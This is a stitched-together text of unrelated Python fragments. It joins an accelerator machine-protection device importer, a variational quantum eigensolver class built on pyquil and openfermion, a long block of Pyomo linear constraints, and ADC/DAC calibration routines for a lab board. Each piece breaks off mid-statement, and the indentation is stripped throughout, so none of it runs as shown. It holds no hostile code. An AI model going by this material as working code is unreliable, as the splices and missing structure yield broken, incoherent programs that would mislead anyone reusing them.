channel_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
channel_info[fields[field_index]]=property
field_index = field_index + 1
channel[channel_info['name']]=channel_info
# for key in channel:
# print 'Key: {3}, Name: {0}, ZeroName: {1}, OneName: {2}, MPS Ch: {4}'.\
# format(channel[key]['name'], channel[key]['z_name'],
# channel[key]['o_name'], key, channel[key]['mps_channel_#'])
f.close()
# Read Mitigation list
file_name = directory + '/Mitigation.csv'
mitigation = self.read_mitigation(file_name)
# Read Ignore conditions (if any)
file_name = directory + '/Conditions.csv'
conditions = None
if (os.path.isfile(file_name)):
conditions = self.read_conditions(file_name)
# Read list of devices, create Faults, FaultStates, etc...
file_name = directory + '/Devices.csv'
f = open(file_name)
line = f.readline().strip()
fields=[]
has_measured_device=False
for field in line.split(','):
lower_case_field = str(field).lower()
fields.append(lower_case_field)
if lower_case_field == 'measured_device_type_id':
has_measured_device=True
# read every device
while line:
device_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
device_info[fields[field_index]]=property
#print fields[field_index] + ' ' + device_info[fields[field_index]]
field_index = field_index + 1
add_device = True
try:
app_card = self.session.query(models.ApplicationCard).\
filter(models.ApplicationCard.id==int(device_info['application_card_number'])).one()
if app_card.name != card_name:
print(('ERROR: digital device ({0}) assigned to non-digital card ({1} at {2} slot {3})'.\
format(device_info['device'], app_card.name, app_card.crate.location, app_card.slot_number)))
return
except:
app_card = None
if (self.lcls1_only):
print(('WARN: Cannot find app_card with number {0}, LCLS-I option active.'.\
format(device_info['application_card_number'])))
continue
# print('ERROR: Cannot find application_card with id {0}, exiting...'.
# return
# If LCLS-I only option is enabled, only add device if it belongs to an LCLS-I
# reporting crate
if (self.lcls1_only and not self.is_lcls1_ln(app_card)):
continue
measured_device = measured_device_type_id
if has_measured_device:
if device_info['measured_device_type_id'] != '-':
measured_device=device_info['measured_device_type_id']
evaluation = 0
if device_info['mitigation'] == '-':
evaluation = 3 # this means the device
<filename>qucochemistry/vqe.py
from typing import List, Union
from pyquil.api import QuantumComputer, WavefunctionSimulator
from pyquil.simulation import NumpyWavefunctionSimulator
from pyquil.quil import Program
from pyquil.gates import RESET
from pyquil.paulis import PauliSum, PauliTerm, ID
from pyquil.operator_estimation import group_experiments, TensorProductState
from pyquil.experiment import Experiment, ExperimentSetting, \
correct_experiment_result
from openfermion.hamiltonians import MolecularData
from openfermion.utils import uccsd_singlet_generator, normal_ordered, \
uccsd_singlet_get_packed_amplitudes, \
expectation, jw_hartree_fock_state
from openfermion.transforms import jordan_wigner, get_sparse_operator, \
get_fermion_operator
from scipy.sparse.linalg import expm_multiply
import numpy as np
import scipy as sp
import time
from qucochemistry.utils import qubitop_to_pyquilpauli, \
pyquilpauli_to_qubitop
from qucochemistry.circuits import ref_state_preparation_circuit, \
uccsd_ansatz_circuit, uccsd_ansatz_circuit_parametric
from qucochemistry.utils import minimizer
class VQEexperiment:
def __init__(self, qc: Union[QuantumComputer, None] = None,
hamiltonian: Union[PauliSum, List[PauliTerm], None] = None,
molecule: MolecularData = None,
method: str = 'Numpy',
strategy: str = 'UCCSD',
optimizer: str = 'BFGS',
maxiter: int = 100000,
shotN: int = 10000,
active_reset: bool = True,
tomography: bool = False,
verbose: bool = False,
parametric: bool = False,
custom_qubits = None):
"""
VQE experiment class.
Initialize an instance of this class to prepare a VQE experiment.
One may instantiate this class either from
an OpenFermion MolecularData object
(containing a chemistry problem Hamiltonian)
or by supplying a Hamiltonian manually.
The VQE can run circuits on different virtual or real backends:
currently, we support the Rigetti QPU backend, a locally running QVM,
a WavefunctionSimulator, and a NumpyWavefunctionSimulator.
Alternatively, one may run the VQE ansatz unitary directly
(not decomposed as a circuit)
via direct exponentiation of the unitary ansatz,
with the 'linalg' method.
The different backends do not all support parametric gates (yet),
and the user can specify whether or not to use it.
Currently, we support two built-in ansatz strategies
and the option of setting your own ansatz circuit.
The built-in UCCSD and HF strategies are based on data
from MolecularData object and thus require one.
To find the ground state of a custom Hamiltonian,
an ansatz strategy must be set manually.
Currently, the only classical optimizer for the VQE
is the scipy.optimize.minimize module.
This may be straightforwardly extended in future releases,
contributions are welcome.
This class can be initialized with any algorithm accepted by
scipy.optimize.minimize, and the maximum number of iterations can be specified.
For some QuantumComputer objects,
the qubit lattice is not numbered 0..N-1
but has architecture-specific logical labels.
These need to be manually read from the lattice topology
and specified in the list custom_qubits.
On the physical hardware QPU,
actively resetting the qubits is supported
to speed up the repetition time of VQE.
To debug and during development, set verbose=True
to print output details to the console.
:param [QuantumComputer(),None] qc: object
:param [PauliSum, list(PauliTerm)] hamiltonian:
Hamiltonian which one would like to simulate
:param MolecularData molecule: OpenFermion Molecule data object.
If this is given, the VQE module assumes a
chemistry experiment using OpenFermion
:param str method: string describing the Backend solver method.
current options: {Numpy, WFS, linalg, QC}
:param str strategy: string describing circuit VQE strategy.
current options: {UCCSD, HF, custom_program}
:param str optimizer: classical optimization algorithm,
choose from scipy.optimize.minimize options
:param int maxiter: max number of iterations
:param int shotN: number of shots in the Tomography experiments
:param bool active_reset: whether or not to actively reset the qubits
:param bool tomography: set to False for access to full wavefunction,
set to True for just sampling from it
:param bool verbose: set to True for verbose output to the console,
for all methods in this class
:param bool parametric: set to True to use parametric gate compilation,
False to compile a new circuit for every iteration
:param list() custom_qubits: list of qubits, i.e. [7,0,1,2] ordering
the qubit IDs as they appear on the QPU
lattice of the QuantumComputer() object.
"""
if isinstance(hamiltonian, PauliSum):
if molecule is not None:
raise TypeError('Please supply either a Hamiltonian object'
' or a Molecule object, but not both.')
# Hamiltonian as a PauliSum, extracted to give a list instead
self.pauli_list = hamiltonian.terms
self.n_qubits = self.get_qubit_req()
# assumes 0-(N-1) ordering and every pauli index is in use
elif isinstance(hamiltonian, List):
if molecule is not None:
raise TypeError('Please supply either a Hamiltonian object'
' or a Molecule object, but not both.')
if len(hamiltonian) > 0:
if all([isinstance(term, PauliTerm) for term in hamiltonian]):
self.pauli_list = hamiltonian
self.n_qubits = self.get_qubit_req()
else:
raise TypeError('Hamiltonian as a list must '
'contain only PauliTerm objects')
else:
print('Warning, empty hamiltonian passed, '
'assuming identity Hamiltonian = 1')
self.pauli_list = [ID()]
# this is allowed in principle,
# but won't make a lot of sense to use.
elif hamiltonian is None:
if molecule is None:
raise TypeError('either feed a MolecularData object '
'or a PyQuil Hamiltonian to this class')
else:
self.H = normal_ordered(get_fermion_operator(
molecule.get_molecular_hamiltonian()))
# store Fermionic
# Hamiltonian in FermionOperator() instance
self.qubitop = jordan_wigner(self.H)
# Apply jordan_wigner transformation and store
self.n_qubits = 2 * molecule.n_orbitals
self.pauli_list = qubitop_to_pyquilpauli(self.qubitop).terms
else:
raise TypeError('hamiltonian must be a PauliSum '
'or list of PauliTerms')
# abstract QC. can refer to a qvm or qpu.
# QC architecture and available gates decide the compilation of the
# programs!
if isinstance(qc, QuantumComputer):
self.qc = qc
elif qc is None:
self.qc = None
else:
raise TypeError('qc must be a QuantumComputer object.'
' If you do not use a QC backend, omit, or supply '
'qc=None')
# number of shots in a tomography experiment
if isinstance(shotN, int):
self.shotN = shotN
elif isinstance(shotN, float):
self.shotN = int(shotN)
else:
raise TypeError('shotN must be an integer or float')
print(f"shots = {self.shotN}")
# simulation method. Choose from
methodoptions = ['WFS', 'linalg', 'QC', 'Numpy']
if method in methodoptions:
self.method = method
else:
raise ValueError('choose a method from the following list: '\
+ str(methodoptions) +
'. If a QPU, QVM is passed to qc, select QC.')
# circuit strategy. choose from UCCSD, HF, custom_program
strategyoptions = ['UCCSD', 'HF', 'custom_program']
if strategy in strategyoptions:
if (strategy in ['UCCSD', 'HF']) and molecule is None:
raise ValueError('Strategy selected, UCCSD or HF, '
'requires a MolecularData object from PySCF as input.')
self.strategy = strategy
else:
raise ValueError('choose a circuit strategy from the'
' following list: ' + str(strategyoptions))
# classical optimizer
classical_options = ['Nelder-Mead', 'Powell', 'CG', 'BFGS',
'Newton-CG', 'L-BFGS-B', 'TNC', 'COBYLA',
'SLSQP', 'trust-constr', 'dogleg', 'trust-ncg',
'trust-exact', 'trust-krylov']
if optimizer not in classical_options:
raise ValueError('choose a classical optimizer from'
' the following list: ' + str(classical_options))
else:
self.optimizer = optimizer
# store the optimizer historical values
self.history = []
# chemistry files. must be properly formatted
# in order to use a UCCSD ansatz (see MolecularData)
self.molecule = molecule
# whether or not the qubits should be actively reset.
# False will make the hardware wait for 3 coherence lengths
# to go back to |0>
self.active_reset = active_reset
# max number of iterations for the classical optimizer
self.maxiter = maxiter
# vqe results, stores output of scipy.optimize.minimize,
# a OptimizeResult object. initialize to None
self.res = None
# list of grouped experiments (only relevant to tomography)
self.experiment_list = None
# whether to print debugging data to console
self.verbose = verbose
# real QPU has a custom qubit labeling
self.custom_qubits = custom_qubits
# i'th function call
self.it_num = 0
# whether to perform parametric method
self.parametric_way = parametric
# whether to do tomography or just calculate the wavefunction
self.tomography = tomography
# set empty circuit unitary.
# This is used for the direct linear algebraic methods.
self.circuit_unitary = None
if strategy not in ['UCCSD', 'HF', 'custom_program']:
raise ValueError('please select a strategy from UCCSD,'
' HF, custom_program or modify this class with your '
'own options')
if strategy == 'UCCSD':
# load UCCSD initial amps from the CCSD amps
# in the MolecularData() object
amps = uccsd_singlet_get_packed_amplitudes(
self.molecule.ccsd_single_amps,
self.molecule.ccsd_double_amps,
n_qubits=self.molecule.n_orbitals * 2,
n_electrons=self.molecule.n_electrons)
self.initial_packed_amps = amps
else:
# allocate empty initial angles for the circuit. modify later.
self.initial_packed_amps = []
if (strategy == 'UCCSD') and (method != 'linalg'):
# UCCSD circuit strategy preparations
self.ref_state = ref_state_preparation_circuit(
molecule,
ref_type='HF',
cq=self.custom_qubits)
if self.parametric_way:
# in the parametric_way,
# the circuit is built with
53.66*m.x882 - 53.66*m.x889
- 7.24*m.x897 - 7.24*m.x916 - 7.24*m.x923 - 7.24*m.x934 - 13.32*m.x960 - 13.32*m.x971
- 48.04*m.x981 - 48.04*m.x998 - 48.04*m.x1014 - 42.08*m.x1023 - 42.08*m.x1030 - 42.08*m.x1040
- 42.08*m.x1052 - 55.03*m.x1148 - 60.06*m.x1202 <= 0)
m.c331 = Constraint(expr= - 16.47*m.x94 - 16.47*m.x108 - 16.47*m.x117 - 16.47*m.x136 - 11.64*m.x155 - 11.64*m.x173
- 11.64*m.x179 - 68.6*m.x188 - 68.6*m.x212 - 68.6*m.x226 - 68.6*m.x237 - 64.76*m.x263
- 64.76*m.x270 - 64.76*m.x279 - 64.76*m.x286 - 64.76*m.x297 - 12.46*m.x307 - 12.46*m.x340
- 54.72*m.x349 - 54.72*m.x356 - 54.72*m.x372 - 54.72*m.x381 - 54.72*m.x388 - 54.72*m.x399
- 73.44*m.x409 - 73.44*m.x433 - 73.44*m.x441 - 73.44*m.x453 - 37.59*m.x463 - 37.59*m.x487
- 37.59*m.x505 - 37.59*m.x514 - 37.59*m.x526 - 30.21*m.x552 - 30.21*m.x569 - 30.21*m.x576
- 30.21*m.x587 - 6.13*m.x613 - 6.13*m.x622 - 6.13*m.x638 - 6.13*m.x647 - 6.13*m.x659
- 39.73*m.x669 - 39.73*m.x676 - 39.73*m.x685 - 39.73*m.x693 - 39.73*m.x705 - 75.46*m.x721
- 75.46*m.x730 - 75.46*m.x746 - 23.71*m.x755 - 23.71*m.x788 - 20.11*m.x797 - 20.11*m.x814
- 20.11*m.x831 - 20.11*m.x843 - 75.24*m.x855 - 10.89*m.x865 - 10.89*m.x882 - 10.89*m.x889
- 13.38*m.x897 - 13.38*m.x916 - 13.38*m.x923 - 13.38*m.x934 - 58.74*m.x960 - 58.74*m.x971
- 41.35*m.x981 - 41.35*m.x998 - 41.35*m.x1014 - 8.42*m.x1023 - 8.42*m.x1030 - 8.42*m.x1040
- 8.42*m.x1052 - 30.21*m.x1148 - 75.24*m.x1202 <= 0)
m.c332 = Constraint(expr= - 69.36*m.x94 - 69.36*m.x108 - 69.36*m.x117 - 69.36*m.x136 - 49.15*m.x155 - 49.15*m.x173
- 49.15*m.x179 - 43.95*m.x188 - 43.95*m.x212 - 43.95*m.x226 - 43.95*m.x237 - 44.71*m.x263
- 44.71*m.x270 - 44.71*m.x279 - 44.71*m.x286 - 44.71*m.x297 - 23.04*m.x307 - 23.04*m.x340
- 37.06*m.x349 - 37.06*m.x356 - 37.06*m.x372 - 37.06*m.x381 - 37.06*m.x388 - 37.06*m.x399
+ 7.66*m.x409 + 7.66*m.x433 + 7.66*m.x441 + 7.66*m.x453 - 2.94*m.x463 - 2.94*m.x487
- 2.94*m.x505 - 2.94*m.x514 - 2.94*m.x526 - 23.16*m.x552 - 23.16*m.x569 - 23.16*m.x576
- 23.16*m.x587 - 24.52*m.x613 - 24.52*m.x622 - 24.52*m.x638 - 24.52*m.x647 - 24.52*m.x659
+ 0.99*m.x669 + 0.99*m.x676 + 0.99*m.x685 + 0.99*m.x693 + 0.99*m.x705 - 48.55*m.x721
- 48.55*m.x730 - 48.55*m.x746 - 43.7*m.x755 - 43.7*m.x788 + 1.17*m.x797 + 1.17*m.x814
+ 1.17*m.x831 + 1.17*m.x843 - 35.83*m.x855 - 58.17*m.x865 - 58.17*m.x882 - 58.17*m.x889
+ 0.780000000000001*m.x897 + 0.780000000000001*m.x916 + 0.780000000000001*m.x923
+ 0.780000000000001*m.x934 + 5.66*m.x960 + 5.66*m.x971 - 50.66*m.x981 - 50.66*m.x998
- 50.66*m.x1014 - 30.42*m.x1023 - 30.42*m.x1030 - 30.42*m.x1040 - 30.42*m.x1052
- 23.16*m.x1148 - 35.83*m.x1202 <= 0)
m.c333 = Constraint(expr= 4.47*m.x94 + 4.47*m.x108 + 4.47*m.x117 + 4.47*m.x136 - 49.64*m.x155 - 49.64*m.x173
- 49.64*m.x179 - 53.98*m.x188 - 53.98*m.x212 - 53.98*m.x226 - 53.98*m.x237 + 2.52*m.x263
+ 2.52*m.x270 + 2.52*m.x279 + 2.52*m.x286 + 2.52*m.x297 - 20.19*m.x307 - 20.19*m.x340
- 44.3*m.x349 - 44.3*m.x356 - 44.3*m.x372 - 44.3*m.x381 - 44.3*m.x388 - 44.3*m.x399
- 32.87*m.x409 - 32.87*m.x433 - 32.87*m.x441 - 32.87*m.x453 - 43.86*m.x463 - 43.86*m.x487
- 43.86*m.x505 - 43.86*m.x514 - 43.86*m.x526 + 1.49*m.x552 + 1.49*m.x569 + 1.49*m.x576
+ 1.49*m.x587 - 61.18*m.x613 - 61.18*m.x622 - 61.18*m.x638 - 61.18*m.x647 - 61.18*m.x659
- 46.77*m.x669 - 46.77*m.x676 - 46.77*m.x685 - 46.77*m.x693 - 46.77*m.x705 - 13.22*m.x721
- 13.22*m.x730 - 13.22*m.x746 - 31.83*m.x755 - 31.83*m.x788 - 17.17*m.x797 - 17.17*m.x814
- 17.17*m.x831 - 17.17*m.x843 - 28.6*m.x855 - 26.17*m.x865 - 26.17*m.x882 - 26.17*m.x889
- 18.54*m.x897 - 18.54*m.x916 - 18.54*m.x923 - 18.54*m.x934 + 3.79*m.x960 + 3.79*m.x971
- 62.55*m.x981 - 62.55*m.x998 - 62.55*m.x1014 - 29.72*m.x1023 - 29.72*m.x1030 - 29.72*m.x1040
- 29.72*m.x1052 + 1.49*m.x1148 - 28.6*m.x1202 <= 0)
m.c334 = Constraint(expr= - 10.64*m.x94 - 10.64*m.x108 - 10.64*m.x117 - 10.64*m.x136 - 40.15*m.x155 - 40.15*m.x173
- 40.15*m.x179 - 22.94*m.x188 - 22.94*m.x212 - 22.94*m.x226 - 22.94*m.x237 - 60.64*m.x263
- 60.64*m.x270 - 60.64*m.x279 - 60.64*m.x286 - 60.64*m.x297 - 3.7*m.x307 - 3.7*m.x340
- 67.51*m.x349 - 67.51*m.x356 - 67.51*m.x372 - 67.51*m.x381 - 67.51*m.x388 - 67.51*m.x399
- 69.6*m.x409 - 69.6*m.x433 - 69.6*m.x441 - 69.6*m.x453 - 68.66*m.x463 - 68.66*m.x487
- 68.66*m.x505 - 68.66*m.x514 - 68.66*m.x526 + 4.77*m.x552 + 4.77*m.x569 + 4.77*m.x576
+ 4.77*m.x587 - 42.8*m.x613 - 42.8*m.x622 - 42.8*m.x638 - 42.8*m.x647 - 42.8*m.x659
- 69.81*m.x669 - 69.81*m.x676 - 69.81*m.x685 - 69.81*m.x693 - 69.81*m.x705 - 55.51*m.x721
- 55.51*m.x730 - 55.51*m.x746 - 14.66*m.x755 - 14.66*m.x788 - 4.47*m.x797 - 4.47*m.x814
- 4.47*m.x831 - 4.47*m.x843 - 58.16*m.x855 - 35.97*m.x865 - 35.97*m.x882 - 35.97*m.x889
- 12.35*m.x897 - 12.35*m.x916 - 12.35*m.x923 - 12.35*m.x934 - 65.88*m.x960 - 65.88*m.x971
- 50.25*m.x981 - 50.25*m.x998 - 50.25*m.x1014 - 57.21*m.x1023 - 57.21*m.x1030 - 57.21*m.x1040
- 57.21*m.x1052 + 4.77*m.x1148 - 58.16*m.x1202 <= 0)
m.c335 = Constraint(expr= 37.49*m.x109 + 37.49*m.x126 + 37.49*m.x137 + 37.07*m.x147 + 37.07*m.x156 + 37.07*m.x166
+ 37.07*m.x174 + 37.07*m.x180 + 31.65*m.x197 + 31.65*m.x221 + 31.65*m.x227 + 31.65*m.x238
+ 3.93*m.x248 + 3.93*m.x271 + 3.93*m.x280 + 3.93*m.x287 + 3.93*m.x298
+ 0.189999999999998*m.x316 + 0.189999999999998*m.x333 + 0.189999999999998*m.x341
- 12.04*m.x365 - 12.04*m.x373 - 12.04*m.x382 - 12.04*m.x389 - 12.04*m.x400 + 39.01*m.x418
+ 39.01*m.x442 + 39.01*m.x454 - 8.42*m.x472 - 8.42*m.x488 - 8.42*m.x498 - 8.42*m.x506
- 8.42*m.x515 - 8.42*m.x527 + 26.15*m.x537 + 26.15*m.x561 + 26.15*m.x570 + 26.15*m.x577
+ 26.15*m.x588 - 12.85*m.x598 - 12.85*m.x614 - 12.85*m.x631 - 12.85*m.x639 - 12.85*m.x648
- 12.85*m.x660 + 17.42*m.x677 + 17.42*m.x694 + 17.42*m.x706 - 16.81*m.x722 - 16.81*m.x739
- 16.81*m.x747 - 27.55*m.x764 - 27.55*m.x781 - 27.55*m.x789 - 15.01*m.x806 - 15.01*m.x823
- 15.01*m.x832 - 15.01*m.x844 - 25.24*m.x856 + 6.73*m.x874 + 6.73*m.x883 + 6.73*m.x890
- 33.73*m.x898 - 33.73*m.x908 - 33.73*m.x917 - 33.73*m.x924 - 33.73*m.x935 + 18.64*m.x945
+ 18.64*m.x955 + 18.64*m.x961 + 18.64*m.x972 + 31.96*m.x990 + 31.96*m.x999 + 31.96*m.x1009
+ 31.96*m.x1015 + 36.08*m.x1031 + 36.08*m.x1041 + 36.08*m.x1053 + 37.49*m.x1065
- 12.04*m.x1115 + 39.01*m.x1126 - 16.81*m.x1179 - 25.24*m.x1203 - 33.73*m.x1219
+ 36.08*m.x1246 <= 0)
m.c336 = Constraint(expr= - 90.76*m.x109 - 90.76*m.x126 - 90.76*m.x137 - 51.74*m.x147 - 51.74*m.x156 - 51.74*m.x166
- 51.74*m.x174 - 51.74*m.x180 - 45.83*m.x197 - 45.83*m.x221 - 45.83*m.x227 - 45.83*m.x238
- 36.81*m.x248 - 36.81*m.x271 - 36.81*m.x280 - 36.81*m.x287 - 36.81*m.x298 - 28.25*m.x316
- 28.25*m.x333 - 28.25*m.x341 - 44.08*m.x365 - 44.08*m.x373 - 44.08*m.x382 - 44.08*m.x389
- 44.08*m.x400 - 55.7*m.x418 - 55.7*m.x442 - 55.7*m.x454 - 77.86*m.x472 - 77.86*m.x488
- 77.86*m.x498 - 77.86*m.x506 - 77.86*m.x515 - 77.86*m.x527 - 71.11*m.x537 - 71.11*m.x561
- 71.11*m.x570 - 71.11*m.x577 - 71.11*m.x588 - 94.46*m.x598 - 94.46*m.x614 - 94.46*m.x631
- 94.46*m.x639 - 94.46*m.x648 - 94.46*m.x660 - 84.92*m.x677 - 84.92*m.x694 - 84.92*m.x706
- 74.64*m.x722 - 74.64*m.x739 - 74.64*m.x747 - 61.57*m.x764 - 61.57*m.x781 - 61.57*m.x789
- 31.58*m.x806 - 31.58*m.x823 - 31.58*m.x832 - 31.58*m.x844 - 31.87*m.x856 - 35.59*m.x874
- 35.59*m.x883 - 35.59*m.x890 - 30.4*m.x898 - 30.4*m.x908 - 30.4*m.x917 - 30.4*m.x924
- 30.4*m.x935 - 81.44*m.x945 - 81.44*m.x955 - 81.44*m.x961 - 81.44*m.x972 - 48.38*m.x990
- 48.38*m.x999 - 48.38*m.x1009 - 48.38*m.x1015 - 80.62*m.x1031 - 80.62*m.x1041 - 80.62*m.x1053
- 90.76*m.x1065 - 44.08*m.x1115 - 55.7*m.x1126 - 74.64*m.x1179 - 31.87*m.x1203 - 30.4*m.x1219
- 80.62*m.x1246 <= 0)
m.c337 = Constraint(expr= 2.85*m.x109 + 2.85*m.x126 + 2.85*m.x137 + 1.6*m.x147 + 1.6*m.x156 + 1.6*m.x166 + 1.6*m.x174
+ 1.6*m.x180 - 10.51*m.x197 - 10.51*m.x221 - 10.51*m.x227 - 10.51*m.x238 + 44.28*m.x248
+ 44.28*m.x271 + 44.28*m.x280 + 44.28*m.x287 + 44.28*m.x298 - 3.45*m.x316 - 3.45*m.x333
- 3.45*m.x341 - 11.75*m.x365 - 11.75*m.x373 - 11.75*m.x382 - 11.75*m.x389 - 11.75*m.x400
+ 45.9*m.x418 + 45.9*m.x442 + 45.9*m.x454 + 24.77*m.x472 + 24.77*m.x488 + 24.77*m.x498
+ 24.77*m.x506 + 24.77*m.x515 + 24.77*m.x527 + 2.32*m.x537 + 2.32*m.x561 + 2.32*m.x570
+ 2.32*m.x577 + 2.32*m.x588 - 20.48*m.x598 - 20.48*m.x614 - 20.48*m.x631 - 20.48*m.x639
- 20.48*m.x648 - 20.48*m.x660 + 8.6*m.x677 + 8.6*m.x694 + 8.6*m.x706 + 34.32*m.x722
+ 34.32*m.x739 + 34.32*m.x747 + 32.91*m.x764 + 32.91*m.x781 + 32.91*m.x789 + 43.64*m.x806
+ 43.64*m.x823 + 43.64*m.x832 + 43.64*m.x844 - 9.1*m.x856 + 12.58*m.x874 + 12.58*m.x883
+ 12.58*m.x890 - 2.39*m.x898 - 2.39*m.x908 - 2.39*m.x917 - 2.39*m.x924 - 2.39*m.x935
- 25.35*m.x945 - 25.35*m.x955 - 25.35*m.x961 - 25.35*m.x972 - 24.93*m.x990 - 24.93*m.x999
- 24.93*m.x1009 - 24.93*m.x1015 - 3.36*m.x1031 - 3.36*m.x1041 - 3.36*m.x1053 + 2.85*m.x1065
- 11.75*m.x1115 + 45.9*m.x1126 + 34.32*m.x1179 - 9.1*m.x1203 - 2.39*m.x1219 - 3.36*m.x1246
<= 0)
m.c338 = Constraint(expr= - 20.86*m.x109 - 20.86*m.x126 - 20.86*m.x137 - 72.78*m.x147 - 72.78*m.x156 - 72.78*m.x166
- 72.78*m.x174 - 72.78*m.x180 - 35.56*m.x197 - 35.56*m.x221 - 35.56*m.x227 - 35.56*m.x238
- 63.68*m.x248 - 63.68*m.x271 - 63.68*m.x280 - 63.68*m.x287 - 63.68*m.x298 - 53.39*m.x316
- 53.39*m.x333 - 53.39*m.x341 - 19.6*m.x365 - 19.6*m.x373 - 19.6*m.x382 - 19.6*m.x389
- 19.6*m.x400 - 71.48*m.x418 - 71.48*m.x442 - 71.48*m.x454 - 20.3*m.x472 - 20.3*m.x488
- 20.3*m.x498 - 20.3*m.x506 - 20.3*m.x515 - 20.3*m.x527 - 38.09*m.x537 - 38.09*m.x561
- 38.09*m.x570 - 38.09*m.x577 - 38.09*m.x588 - 16.84*m.x598 - 16.84*m.x614 - 16.84*m.x631
- 16.84*m.x639 - 16.84*m.x648 - 16.84*m.x660 - 65.85*m.x677 - 65.85*m.x694 - 65.85*m.x706
- 84.1*m.x722 - 84.1*m.x739 - 84.1*m.x747 - 17.46*m.x764 - 17.46*m.x781 - 17.46*m.x789
== 0:
nvalue = 0.0
else:
nvalue = vref*readADC(ch2)
return pvalue - nvalue
'''
@rCurrent@
rCurrent(r,ch1,ch2)
Reads the voltage on a resistor and computes current from it
If any channel is zero, it is considered as GND
Parameters:
r : Resistor value
ch1 : Positive terminal ADC channel
ch2 : Negative terminal ADC channel
If omitted it is considered to be GND
Returns the resistor current
Included in slab.py
'''
def rCurrent(r,ch1,ch2=0):
v = readVoltage(ch1,ch2)
i = v/r
return i
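# Hedged usage sketch (not part of the original file): current through a resistor
# whose terminals are wired to ADC1 and ADC2; the 1000-Ohm value is an example.
def _example_resistor_current():
    return rCurrent(1000.0, 1, 2)   # voltage across ADC1-ADC2 divided by the resistor value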
'''
@setDCreadings@
setDCreadings(number)
Sets the number of readings to average on each DC measurement
Parameter:
number : Number of values to read
Returns the previous value of this setting
Included in slab.py
'''
def setDCreadings(number):
global dcroundings
lastValue = dcroundings
# Check
if number < 1:
raise SlabEx("Number of readings must be greater or equal than 1")
if number > 65535:
raise SlabEx("Number of readings too big")
dcroundings = int(number)
# Send command
startCommand('N')
sendU16(dcroundings)
sendCRC()
checkACK()
checkCRC()
return lastValue
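# Hedged usage sketch (not in the original file): temporarily raise the averaging
# count around a sensitive DC measurement and restore the previous setting afterwards.
def _example_averaged_reading():
    previous = setDCreadings(200)   # average 200 samples per DC reading
    value = readVoltage(1, 0)       # ADC1 referenced to GND
    setDCreadings(previous)         # restore the caller's setting
    return value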
'''
@adcCalibrate@
adcCalibrate()
Second stage of board calibration
Calibrates ADCs against DAC1
Stores calibration data on ADC_CAL_FILE file
Returns nothing
Included in slab.py
'''
def adcCalibrate():
global xcal,ycal1,ycal2,ycal3,ycal4,adcCalData
print()
print("Calibration of ADCs")
print()
print("Connect the DAC 1 output to all ADC inputs")
print("Use the buffers in all connections")
print()
input("Press [Return] to continue")
# Increase number of readings for better calibration
lastDCR=setDCreadings(1000)
# Define input calibration range and steps
# xcal = np.arange(0.0,1.1,0.1)
xcal = []
for x in range(0,11):
xcal.append(x/10.0)
# Output range is now empty
ycal1 = []
ycal2 = []
ycal3 = []
ycal4 = []
# Obtain calibration data
# We use readChannel because it does not depend on
# previous calibrations
message(1,"Performing ADC calibration")
for x in xcal:
message(2," Calibrate at " + str(x))
writeDAC(1,x) # Set DAC value
time.sleep(0.1) # Wait a little
a1 = readChannel(1) # ADC read
a2 = readChannel(2)
a3 = readChannel(3)
a4 = readChannel(4)
ycal1.append(a1) # Append values
ycal2.append(a2)
ycal3.append(a3)
ycal4.append(a4)
prev1 = -1
# Check that each ADC calibration curve is monotonic
for x,y1,y2,y3,y4 in zip(xcal,ycal1,ycal2,ycal3,ycal4):
if prev1 != -1:
if y1 < prev1:
raise SlabEx("Channel 1 is not monotonic")
if y2 < prev2:
raise SlabEx("Channel 2 is not monotonic")
if y3 < prev3:
raise SlabEx("Channel 3 is not monotonic")
if y4 < prev4:
raise SlabEx("Channel 4 is not monotonic")
prev1 = y1
prev2 = y2
prev3 = y3
prev4 = y4
# Show graph if we have SciPy
if not scipy:
cannotPlot()
else:
plt.figure(facecolor="white") # White border
pl.plot(xcal,ycal1,label="ADC1") # Show curves
pl.plot(xcal,ycal2,label="ADC2")
pl.plot(xcal,ycal3,label="ADC3")
pl.plot(xcal,ycal4,label="ADC4")
pl.xlabel('DAC1 Value') # Set X label
pl.ylabel('ADC 1,2,3,4 Values') # Set Y label
pl.title('ADC Ratiometric Calibration Curves') # Set title
pl.legend(loc='lower right')
pl.grid()
pl.show()
pl.close()
# Save of calibration data
message(1,"Saving calibration data to " + fprefix + calprefix + ADC_CAL_FILE)
with open(fprefix + calprefix + ADC_CAL_FILE,'wb') as f:
pickle.dump([xcal,ycal1,ycal2,ycal3,ycal4], f)
# All calibration tables
adcCalData = [ycal1,ycal2,ycal3,ycal4]
# Restore the number of ADC readings
setDCreadings(lastDCR)
print()
print("Calibration of ADCs completed")
print()
'''
Stores DAC calibration data
Internal function
Parameter:
n : Number of DACs to show
'''
def _storeAndShowDACcalibration(n):
global dacCalData   # declared global so the calibration table built below persists at module level
# Plot if we have SciPy
if not scipy:
cannotPlot()
else:
plt.figure(facecolor="white") # White border
pl.plot(dacx,dac1y,label="DAC1") # Show curves
if n >= 2:
pl.plot(dacx,dac2y,label="DAC2")
if n >= 3:
pl.plot(dacx,dac3y,label="DAC3")
pl.xlabel('DAC Value') # Set X label
pl.ylabel('Real Ratiometric Values') # Set Y label
pl.title('DAC Ratiometric Calibration Curves') # Set title
pl.legend(loc='lower right')
pl.grid()
pl.show()
pl.close()
message(1,"Saving calibration data to "+ fprefix + calprefix + DAC_CAL_FILE)
with open(fprefix + calprefix + DAC_CAL_FILE,'wb') as f:
pickle.dump([dacx,dac1y,dac2y,dac3y,dac4y], f)
# All calibration tables
dacCalData = [dac1y,dac2y,dac3y,dac4y]
'''
@dacCalibrate@
dacCalibrate()
Third stage of board calibration
Calibrates DAC(i) against ADC(i)
Stores calibration data on DAC_CAL_FILE file
Returns nothing
Included in slab.py
'''
def dacCalibrate():
global dacx,dac1y,dac2y,dac3y,dac4y,dacCalData
print()
print("Calibration of DACs")
print()
print("Connect the DAC outputs to ADC inputs with same number")
print("DAC 1 to ADC 1 and DAC2 to ADC2 and son on...")
print()
input("Press [Return] to continue")
# Increase number of readings for better calibration
lastDCR=setDCreadings(1000)
# Define input calibration range and steps
# dacx = np.arange(0.0,1.1,0.1)
dacx = []
for x in range(0,11):
dacx.append(x/10.0)
# Output range is now empty
dac1y = []
dac2y = []
dac3y = []
dac4y = []
# Obtain calibration data
# We use previously calibrated ADC channels
message(1,"Performing DAC calibration")
for x in dacx:
message(2," Calibrate at " + str(x))
writeChannel(1,x) # Set DAC values without calibration
writeChannel(2,x)
if ndacs >= 3:
